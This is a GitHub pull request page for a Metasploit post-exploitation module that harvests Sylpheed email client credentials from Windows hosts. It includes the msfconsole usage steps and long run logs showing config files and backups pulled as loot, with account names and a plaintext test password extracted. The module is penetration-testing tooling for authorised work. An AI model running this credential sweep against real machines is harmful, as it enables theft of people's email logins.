Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Sylpheed Email PackRat module #19171

Merged
4 commits merged into from May 17, 2024
Merged

Add Sylpheed Email PackRat module #19171

4 commits merged into from May 17, 2024

Conversation

The-Pink-Panther
Copy link
Contributor

As A part of my final year project at Leeds Beckett University, I have developed several post-exploitation modules utilising the existing PackRat framework built by former LBU students. This PR will add a new /post/windows/gather/credentials module for the Sylpheed Email Client. https://sylpheed.sraoss.jp/en/

This pull request will add two files:

  1. modules/post/windows/gather/credentials/sylpheed.rb
  2. documentation/modules/post/windows/gather/credentials/sylpheed.md

Verification

  1. Start msfconsole
  2. Get a Meterpreter session on a Windows system
  3. use post/windows/gather/credentials/sylpheed
  4. Set SESSION 1
  5. run

Scenario

Using Sylpheed Email v3.17.0 running on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045

msf6 post(windows/gather/credentials/sylpheed) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Sylpheed's Accountrc file found
[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc
[*] Sylpheed Accountrc downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_Sylpheedaccountr_511987.bin

[+] account_name=tmctestface50@gmail.com
[+] account_name=TheTestBed@testers.com
[+] account_name=tmctestface50@gmail.com
[+] name=tmctestface50@gmail.com
[+] name=TestMcTestFace
[+] name=TheTestBed@testers.com
[+] name=Test
[+] name=tmctestface50@gmail.com
[+] name=Testy
[+] address=tmctestface50@gmail.com
[+] address=TheTestBed@testers.com
[+] address=tmctestface50@gmail.com
[+] password=tiaspbiqe2r
[+] password=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_EXTRACTIONaccoun_507929.bin
[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.1
[*] Sylpheed Accountrc.bak.1 downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_Sylpheedaccountr_329585.1

[+] account_name=tmctestface50@gmail.com
[+] account_name=TheTestBed@testers.com
[+] account_name=tmctestface50@gmail.com
[+] name=tmctestface50@gmail.com
[+] name=TestMcTestFace
[+] name=TheTestBed@testers.com
[+] name=Test
[+] name=tmctestface50@gmail.com
[+] name=Testy
[+] address=tmctestface50@gmail.com
[+] address=TheTestBed@testers.com
[+] address=tmctestface50@gmail.com
[+] password=tiaspbiqe2r
[+] password=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_146899.1
[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak
[*] Sylpheed Accountrc.bak downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_450482.bak

[+] account_name=tmctestface50@gmail.com
[+] account_name=TheTestBed@testers.com
[+] account_name=tmctestface50@gmail.com
[+] name=tmctestface50@gmail.com
[+] name=TestMcTestFace
[+] name=TheTestBed@testers.com
[+] name=Test
[+] name=tmctestface50@gmail.com
[+] name=Testy
[+] address=tmctestface50@gmail.com
[+] address=TheTestBed@testers.com
[+] address=tmctestface50@gmail.com
[+] password=tiaspbiqe2r
[+] password=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_424899.bak
[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.2
[*] Sylpheed Accountrc.bak.2 downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_852103.2

[+] account_name=tmctestface50@gmail.com
[+] account_name=TheTestBed@testers.com
[+] account_name=tmctestface50@gmail.com
[+] name=tmctestface50@gmail.com
[+] name=TestMcTestFace
[+] name=TheTestBed@testers.com
[+] name=Test
[+] name=tmctestface50@gmail.com
[+] name=Testy
[+] address=tmctestface50@gmail.com
[+] address=TheTestBed@testers.com
[+] address=tmctestface50@gmail.com
[+] password=tiaspbiqe2r
[+] password=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_342490.2
[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.3
[*] Sylpheed Accountrc.bak.3 downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_575350.3

[+] account_name=tmctestface50@gmail.com
[+] account_name=TheTestBed@testers.com
[+] account_name=tmctestface50@gmail.com
[+] name=tmctestface50@gmail.com
[+] name=TestMcTestFace
[+] name=TheTestBed@testers.com
[+] name=Test
[+] name=tmctestface50@gmail.com
[+] name=Testy
[+] address=tmctestface50@gmail.com
[+] address=TheTestBed@testers.com
[+] address=tmctestface50@gmail.com
[+] password=tiaspbiqe2r
[+] password=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_EXTRACTIONaccoun_038250.3
[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.4
[*] Sylpheed Accountrc.bak.4 downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_Sylpheedaccountr_780534.4

[+] account_name=tmctestface50@gmail.com
[+] account_name=TheTestBed@testers.com
[+] account_name=tmctestface50@gmail.com
[+] name=tmctestface50@gmail.com
[+] name=TestMcTestFace
[+] name=TheTestBed@testers.com
[+] name=Test
[+] name=tmctestface50@gmail.com
[+] name=Testy
[+] address=tmctestface50@gmail.com
[+] address=TheTestBed@testers.com
[+] address=tmctestface50@gmail.com
[+] password=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_EXTRACTIONaccoun_554415.4
[*] PackRat credential sweep Completed
[*] Post module execution completed

@bwatters-r7 bwatters-r7 self-assigned this May 10, 2024
The-Pink-Panther and others added 3 commits May 15, 2024 14:58
@The-Pink-Panther @cgranleese-r7
Fixed documentation formatting
e6669ea 
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@The-Pink-Panther @cgranleese-r7
Re-structured artifact enumeration option
7a33970 
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@The-Pink-Panther
Added Sylpheed and Windows version to documentation scenarios
22d16b9
@bwatters-r7
Copy link
Contributor 

msf6 post(windows/gather/credentials/sylpheed) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Starting Packrat...
[*] Sylpheed's base folder found
[*] Found the folder containing specified artifact for accountrc.
[-] Sylpheed's Accountrc not found in msfuser's user directory

[-] Skipping accountrc since it was not found on the user's folder.
[*] PackRat credential sweep Completed
[*] Post module execution completed
msf6 post(windows/gather/credentials/sylpheed) > show options

Module options (post/windows/gather/credentials/sylpheed):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ARTIFACTS     All              no        Type of artifacts to collect (Accepted: All, logins)
   EXTRACT_DATA  true             no        Extract data and stores in a separate file
   SESSION       1                yes       The session to run this module on
   STORE_LOOT    true             no        Store artifacts into loot database


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/sylpheed) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Starting Packrat...
[*] Sylpheed's base folder found
[*] Found the folder containing specified artifact for accountrc.
[-] Sylpheed's Accountrc not found in msfuser's user directory

[-] Skipping accountrc since it was not found on the user's folder.
[*] PackRat credential sweep Completed
[*] Post module execution completed
msf6 post(windows/gather/credentials/sylpheed) >

@bwatters-r7 bwatters-r7 closed this pull request by merging all changes into rapid7:master in 8a68eeb May 17, 2024
@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label May 17, 2024
@bwatters-r7
Copy link
Contributor

Release Notes

This adds a gather module leveraging Packrat targeting Sylpheed Email client.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@cgranleese-r7 cgranleese-r7 cgranleese-r7 left review comments

Assignees

@bwatters-r7 bwatters-r7

Labels
rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@The-Pink-Panther @bwatters-r7 @cgranleese-r7